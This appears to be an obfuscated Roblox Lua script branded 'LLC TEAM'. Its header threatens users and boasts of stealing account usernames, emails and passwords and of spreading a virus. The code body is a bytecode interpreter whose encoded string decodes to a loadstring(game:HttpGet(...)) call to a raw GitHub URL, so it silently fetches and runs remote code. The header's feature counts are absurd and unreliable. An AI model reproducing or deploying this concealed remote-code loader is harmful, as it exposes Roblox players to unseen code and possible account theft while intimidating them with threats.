--[[

ðŸ”’ LOCKED BY LLC TEAM ðŸ”’
V17.12.11 [ GUARDIAN & EXEC.CMD ]

Updated protect script: 2023/01/15

-- > Note: Guardian, v20.16.9, command auto lock, give virus auto for skidders v17, skidders inform acc Roblox will saved into this script for BYPASS. < --
llcteamhelp@gmail.com for our best PROTECT auto updated by LLC Team & LX Team

Better than anything protector inmade by 50 Creator of Executor & Scripter user of top.
also have 900000000+ lines, 300000 Spy attacker hard v9, 31000 Virus Malware v13, 630000 Attacker Hard Malware v28, 759272 Attacker spy shoot v21 for your all private info.
Features LLC TEAM SINCE 2010:
ðŸ”§ Auto Take Skidder Info Roblox Account Password [ Take Username, Email, Password auto changed. ]
ðŸ”“ Auto Give Virus v17 [ The Hardware attacker for all Models Phone & PC. ]
ðŸ” Auto Save Search Roblox, Manager, Private Info all to LLC TEAM.
âŽ Fake Link [ Will show up every search if you try to open this ]
ðŸ“ Emails Collect [ Try Bypass This? Your all information private will spy by us ]
âš ï¸ For Bypasser this you will cannot safe, all whatever protector trash because WE ARE CAN DO ANYTHING IF YOU DO
LLC TEAM NEVER GIVE YOU AN FREEDOM AFTER BYPASS THIS, YOU WILL ENDED.

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,958 -(892 + 65) ,47 -27 ) * ((621 -(555 + 64))^(963 -(857 + 74)))) + v34 ;local v38=v21(v35,589 -((482 -115) + (1388 -(1069 + 118))) ,958 -(214 + 713) );local v39=((v21(v35,9 + 23 )==(1 + 0)) and  -1) or 1 ;if (v38==(0 + 0)) then if (v37==(877 -(282 + 595))) then return v39 * ((0 -0) + 0) ;else v38=3 -2 ;v36=1637 -(1523 + 114) ;end elseif (v38==(1840 + 207)) then return ((v37==(0 -0)) and (v39 * ((1066 -(68 + 997))/(1270 -(226 + (2283 -1239)))))) or (v39 * NaN) ;end return v8(v39,v38-(4454 -3431) ) * (v36 + (v37/((119 -(32 + 15 + 70))^(51 + 1)))) ;end v26=nil;function v26(v40)local v41=0 -0 ;local v42;local v43;while true do if (v41==(1 + 0)) then v42=v3(v16,v19,(v19 + v40) -(792 -(368 + 423)) );v19=v19 + v40 ;v41=6 -4 ;end if (v41==(20 -(10 + 8))) then v43={};for v90=(441 -(145 + 293)) -2 , #v42 do v43[v90]=v2(v1(v3(v42,v90,v90)));end v41=445 -(416 + 26) ;end if (v41==(9 -6)) then return v6(v43);end if (v41==(0 + (430 -(44 + 386)))) then v42=nil;if  not v40 then v40=v24();if (v40==(0 -0)) then return "";end end v41=1;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v44==(867 -(550 + 317))) then v45=0 -0 ;v46=nil;v44=1;end if (v44==2) then v49=nil;v50=nil;v44=3;end if (v44==(3 -0)) then v51=nil;v52=nil;v44=11 -7 ;end if (v44==(286 -(134 + 151))) then v47=nil;v48=nil;v44=2;end if (v44==4) then v53=nil;while true do if (v45~=(1669 -(970 + 695))) then else while true do if (v46==(3 -1)) then v51=nil;v52=nil;v46=3;end if (v46==3) then v53=nil;while true do local v107=0;local v108;while true do if ((1990 -(582 + 1408))~=v107) then else v108=0 -0 ;while true do if (v108~=(1 -0)) then else if (v47~=(7 -5)) then else local v148=1824 -(1195 + 629) ;local v149;while true do if (v148~=(0 -0)) then else v149=0;while true do local v150=0;while true do if ((241 -(187 + 54))~=v150) then else if (v149==(780 -(162 + 618))) then for v157=1,v24() do local v158=0 + 0 ;local v159;local v160;local v161;while true do if (v158~=(1 + 0)) then else v161=nil;while true do if (v159~=0) then else local v165=0;while true do if (v165~=(1 -0)) then else v159=1 -0 ;break;end if (v165~=0) then else v160=0;v161=nil;v165=1;end end end if (v159~=(1 + 0)) then else while true do if (0~=v160) then else v161=v22();if (v21(v161,1637 -(1373 + 263) ,1001 -(451 + 549) )~=(0 + 0)) then else local v167=0 -0 ;local v168;local v169;local v170;local v171;while true do if (v167~=(1 -0)) then else v170=nil;v171=nil;v167=1386 -(746 + 638) ;end if (v167~=(1 + 1)) then else while true do if (v168~=0) then else local v180=0 -0 ;while true do if (v180==(342 -(218 + 123))) then v168=1582 -(1535 + 46) ;break;end if (v180==(0 + 0)) then v169=v21(v161,2,1 + 2 );v170=v21(v161,564 -(306 + 254) ,6);v180=1 + 0 ;end end end if (v168==(1 -0)) then v171={v23(),v23(),nil,nil};if (v169==0) then local v183=0;while true do if ((0 -0)==v183) then v171[606 -(268 + 335) ]=v23();v171[294 -(60 + 230) ]=v23();break;end end elseif (v169==1) then v171[3]=v24();elseif (v169==(574 -(426 + 146))) then v171[1 + 2 ]=v24() -(2^16) ;elseif (v169~=3) then else local v197=0;local v198;while true do if (v197~=(1456 -(282 + 1174))) then else v198=811 -(569 + 242) ;while true do if (v198~=(0 -0)) then else v171[1 + 2 ]=v24() -(2^16) ;v171[4]=v23();break;end end break;end end end v168=2;end if (v168==2) then if (v21(v170,1025 -(706 + 318) ,1)~=(1252 -(721 + 530))) then else v171[1273 -(945 + 326) ]=v53[v171[2]];end if (v21(v170,4 -2 ,2 + 0 )==(701 -(271 + 429))) then v171[3 + 0 ]=v53[v171[3]];end v168=3;end if (v168==3) then if (v21(v170,3,3)~=(1501 -(1408 + 92))) then else v171[4]=v53[v171[4]];end v48[v157]=v171;break;end end break;end if ((1086 -(461 + 625))==v167) then v168=1288 -(993 + 295) ;v169=nil;v167=1 + 0 ;end end end break;end end break;end end break;end if (v158==0) then v159=0;v160=nil;v158=1172 -(418 + 753) ;end end end for v162=1,v24() do v49[v162-1 ]=v29();end v149=1 + 0 ;end if (v149~=(1 + 0)) then else return v51;end break;end end end break;end end end break;end if (v108~=(0 + 0)) then else local v146=0;local v147;while true do if (v146~=0) then else v147=0 + 0 ;while true do if ((530 -(406 + 123))==v147) then v108=1;break;end if (v147~=0) then else local v151=1769 -(1749 + 20) ;while true do if (v151==1) then v147=1;break;end if (v151~=0) then else if (v47~=(1 + 0)) then else local v152=1322 -(1249 + 73) ;local v153;local v154;while true do if (v152==(1 + 0)) then while true do if (0==v153) then v154=0;while true do if (v154~=1) then else local v166=0;while true do if (v166~=(1146 -(466 + 679))) then else v154=4 -2 ;break;end if (v166~=0) then else for v173=1,v52 do local v174=0 -0 ;local v175;local v176;local v177;local v178;while true do if (v174==1) then v177=nil;v178=nil;v174=2;end if (v174~=0) then else local v179=0;while true do if (1~=v179) then else v174=1;break;end if (v179~=0) then else v175=0;v176=nil;v179=1901 -(106 + 1794) ;end end end if (v174==2) then while true do if (v175~=(0 + 0)) then else local v182=0;while true do if (v182~=1) then else v175=1;break;end if (v182==(0 + 0)) then v176=0 -0 ;v177=nil;v182=2 -1 ;end end end if (v175==1) then v178=nil;while true do if (v176~=(115 -(4 + 110))) then else if (v177==1) then v178=v22()~=(584 -(57 + 527)) ;elseif (v177==(1429 -(41 + 1386))) then v178=v25();elseif (v177==(106 -(17 + 86))) then v178=v26();end v53[v173]=v178;break;end if (v176==(0 + 0)) then local v192=0 -0 ;local v193;while true do if (v192~=0) then else v193=0 -0 ;while true do if (v193~=(167 -(122 + 44))) then else v176=1;break;end if ((0 -0)~=v193) then else v177=v22();v178=nil;v193=3 -2 ;end end break;end end end end break;end end break;end end end v51[3 + 0 ]=v22();v166=1 + 0 ;end end end if ((3 -1)==v154) then v47=2;break;end if (0~=v154) then else v52=v24();v53={};v154=66 -(30 + 35) ;end end break;end end break;end if (v152~=(0 + 0)) then else v153=0;v154=nil;v152=1;end end end if (v47~=0) then else local v155=0;local v156;while true do if (v155==0) then v156=0;while true do if (v156~=(1257 -(1043 + 214))) then else v48={};v49={};v156=1;end if (v156==(7 -5)) then v47=1213 -(323 + 889) ;break;end if (v156==1) then local v164=0;while true do if (v164==(2 -1)) then v156=582 -(361 + 219) ;break;end if (v164==(320 -(53 + 267))) then v50={};v51={v48,v49,nil,v50};v164=1;end end end end break;end end end v151=1;end end end end break;end end end end break;end end end break;end if (v46==0) then v47=0 + 0 ;v48=nil;v46=1 + 0 ;end if (v46~=(851 -(20 + 830))) then else v49=nil;v50=nil;v46=2;end end break;end if ((3 + 0)~=v45) then else local v98=126 -(116 + 10) ;while true do if (v98==1) then v45=1 + 3 ;break;end if ((738 -(542 + 196))~=v98) then else v52=nil;v53=nil;v98=1;end end end if (v45~=2) then else v50=nil;v51=nil;v45=3;end if (v45==0) then v46=0;v47=nil;v45=1 -0 ;end if (1==v45) then local v99=0;while true do if (v99~=(1 + 0)) then else v45=2;break;end if (v99~=(0 + 0)) then else v48=nil;v49=nil;v99=1 + 0 ;end end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v82=0;while true do if (v82==0) then v20=v0(v3(v54,1,1));return "";end end else local v83=v2(v0(v54,16));if v20 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v83,v20);v20=nil;v92=1;end end else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (7 -4) );v19=v19 + (9 -5) ;return (v58 * (16778767 -(1126 + (1546 -(118 + 1003))))) + (v57 * (65941 -(118 + 287))) + (v56 * (1003 -(2186 -1439))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v84=0,v76 do if (v84>=v70) then v74[v84-v70 ]=v75[v84 + 1 ];else v78[v84]=v75[v84 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=6) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v61[v80[3]];elseif (v81>1) then local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==2) then for v141=v110,v73 do v113=v113 + 1 ;v78[v141]=v111[v113];end break;end if (v109==0) then v110=v80[2];v111,v112=v71(v78[v110](v13(v78,v110 + 1 ,v80[3])));v109=1;end if (v109==1) then v73=(v112 + v110) -1 ;v113=0;v109=2;end end else v78[v80[2]]=v80[3];end elseif (v81<=4) then if (v81>3) then local v116=0;local v117;while true do if (0==v116) then v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));break;end end else v78[v80[2]]=v61[v80[3]];end elseif (v81>5) then do return;end else v78[v80[2]]=v80[3];end elseif (v81<=9) then if (v81<=7) then local v102=v80[2];local v103=v78[v80[3]];v78[v102 + 1 ]=v103;v78[v102]=v103[v80[4]];elseif (v81==8) then do return;end else local v122=v80[2];v78[v122]=v78[v122](v13(v78,v122 + 1 ,v73));end elseif (v81<=11) then if (v81>10) then v78[v80[2]]();else local v124=0;local v125;local v126;while true do if (v124==1) then v78[v125 + 1 ]=v126;v78[v125]=v126[v80[4]];break;end if (0==v124) then v125=v80[2];v126=v78[v80[3]];v124=1;end end end elseif (v81==12) then v78[v80[2]]();else local v127=v80[2];local v128,v129=v71(v78[v127](v13(v78,v127 + 1 ,v80[3])));v73=(v129 + v127) -1 ;local v130=0;for v131=v127,v73 do local v132=0;while true do if (v132==0) then v130=v130 + 1 ;v78[v131]=v128[v130];break;end end end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v87=(v65/(((821 -442) -(142 + 235))^(v66-((11 -7) -3))))%((1 + 1)^(((v67-(978 -((1238 -685) + 424))) -(v66-(1 -(0 + 0)))) + 1 + 0)) ;return v87-(v87%(1 + 0)) ;else local v88=0;local v89;while true do if (0==v88) then v89=(2 + (0 -0))^(v66-1) ;return (((v65%(v89 + v89))>=v89) and (1 + 0)) or (0 + 0) ;end end end end v22=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403C93O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O4C437465616D732F5A4B4875622F6D61696E2F254430253945253243253230254431253830254430254235254430254231254431253846254431253832254430254230253243253230254430254232254431253842253230254431253831254430254244254430254245254430254232254430254230253230254430253931254430252O4225443025424525443025424125443025424325443025423025443025424425334600083O0012033O00013O001203000100023O002007000100010003001205000300044O000D000100034O00045O00022O000B3O000100012O00083O00017O00",v9(),...);end
